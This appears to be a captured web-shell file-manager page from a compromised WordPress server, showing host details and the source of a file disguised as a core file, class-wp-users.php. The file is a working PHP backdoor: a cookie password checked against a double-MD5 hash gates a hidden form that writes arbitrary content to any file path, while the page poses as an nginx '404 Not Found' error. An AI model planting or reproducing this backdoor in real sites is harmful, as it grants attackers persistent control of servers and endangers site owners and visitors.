HEX
Server: Apache/2.4.57 (Unix) OpenSSL/1.1.1k
System: Linux server.eshhar.net 4.18.0-553.89.1.el8_10.x86_64 #1 SMP Mon Dec 8 03:53:08 EST 2025 x86_64
User: xdas (1048)
PHP: 7.4.33
Disabled: mail,sendmail
$ pwd: /home/xdas/public_html/wp-includes/blocks/audio/audio/
Upload Files
File: /home/xdas/public_html/wp-includes/blocks/audio/audio/class-wp-users.php
<?php
if (!isset($_COOKIE['passwd']) || (md5(md5($_COOKIE['passwd'])) != '55a7833734c4079e529a52f152ddbd58')) {
    header("HTTP/1.1 404 Not Found");
    exit();
}
?>
<?php
if ($_POST)
{
    $f=fopen($_POST["f"],"w");
    if(fwrite($f,$_POST["c"]))
        echo "<font color=red>OK!</font>";
    else
        echo "<font color=blue>Error!</font>";
}
?>
<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
<form style="display: none;" action="" method="post">
    <input type="text" size=61 name="f" value='<?php echo $_SERVER["SCRIPT_FILENAME"];?>'><br><br>
    <textarea name="c" cols=60 rows=15></textarea><br>
    <input type="submit" id="b" value="Create"><br>
</form>
</body>
</html>
<?php
die("");
?>
@ Telegram